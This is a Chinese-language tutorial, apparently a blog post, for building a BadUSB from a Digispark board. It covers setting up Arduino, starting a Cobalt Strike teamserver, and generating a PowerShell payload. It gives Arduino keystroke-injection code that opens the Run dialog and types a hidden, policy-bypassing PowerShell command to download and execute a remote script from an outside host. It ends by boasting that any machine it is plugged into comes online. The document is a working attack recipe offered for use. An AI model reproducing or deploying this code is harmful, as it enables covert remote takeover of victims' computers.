0X00、工具準備
digispark開發板。
淘寶連接:https://m.tb.cn/h.VK7vwjy?sm=d85844
![]()
0X01、安裝Arduino IDE環境
0X01、安裝Arduino IDE環境1、安裝 arduino 的 IDE。
下載地址:https://www.arduino.cc/en/Main/Software
新版下載:https://downloads.arduino.cc/arduino-1.8.3-windows.zip
2、下載驅動
鏈接:http://pan.baidu.com/s/1i4K10dn 密碼:ilaf
3、驅動安裝
如果是 64 位操作系統請選擇 DPinst64.exe,否則請選擇 DPinst.exe.
4、配置環境
點擊文件--首選項
附加開發板管理器網址:http://digistump.com/package_digistump_index.json
點擊工具--開發板管理器
等待下載完成,下載可能需要掛國外代理。
找到這個進行安裝
安裝完成後開發板選擇這個
0X02、使用CobaltStrike生成木馬
1、啓動CS
服務器:
通過screen啓動cs服務端
screen
./teamserver 129.204.113.202 admin888
ctrl + a+d 將當前程序放到後臺。
客戶端啓動
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
客戶端連接
2、生成木馬
配置監聽器:
使用CS生成powershell的腳本。
保存到桌面
3、放到遠程服務器備用
將腳本上傳到HTTP服務器備用
0X03、BadUsb製作
代碼如下:
#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76
void setup() {
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {
}
功能是下載打開windwos+r 運行窗口,輸入命令執行。
點擊上傳,在60s之內插入你的badusb。
上傳成功。
插哪哪上線!
0X04、參考鏈接
https://mp.weixin.qq.com/s/3lkdXK_g-_xcf378FNly1A
https://mp.weixin.qq.com/s/UROx1fJOmMVbmH_-UasFEQ